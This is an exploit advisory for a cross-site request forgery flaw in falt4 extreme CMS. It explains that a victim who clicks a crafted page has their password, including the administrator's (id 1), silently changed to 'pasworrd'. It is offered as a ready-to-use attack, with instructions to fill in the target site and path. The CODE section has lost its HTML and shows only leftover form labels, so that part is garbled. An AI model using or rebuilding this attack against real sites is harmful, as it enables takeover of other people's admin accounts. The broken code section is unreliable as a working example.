####################################### # #falt4 extreme (RC4,10.9.2007) cms cross site request forgery ######################################## # #Authors:d14l and marcoj ####################################### # #cms homepage:www.falt4.org ####################################### #greetz:soul,stefo,sp1r1t,stexor,stronix,invisible,kisobran,csi and others # ######################################## falt4 cms suffers from csrf vulnerability which allows attacket to change victim's password you need only edit [site] and [path] in code and when victim click on it it will change its password to "pasworrd" id of admin is "1" ######################################################CODE##########################################################
  Listview
  Add User
  Add Group
 
  Process
  Save
  Back
>Logged in as 

  > [Logout]

  > My Profile

  

  
Account information
User properties from change
Name:
Password:
Status:Administrator
eMail:
ICQ:
Picture:
Signature:
www:
Default editor:
Backend Language:
Sort by:
Genenral time information:
Auto puplishing:
Messages recieved from CMS:


Security Settings
Secure Login:YesNo
existing IP- Adressen:
add new IP-adress:


 
Save

Back
###############################################################END############################################################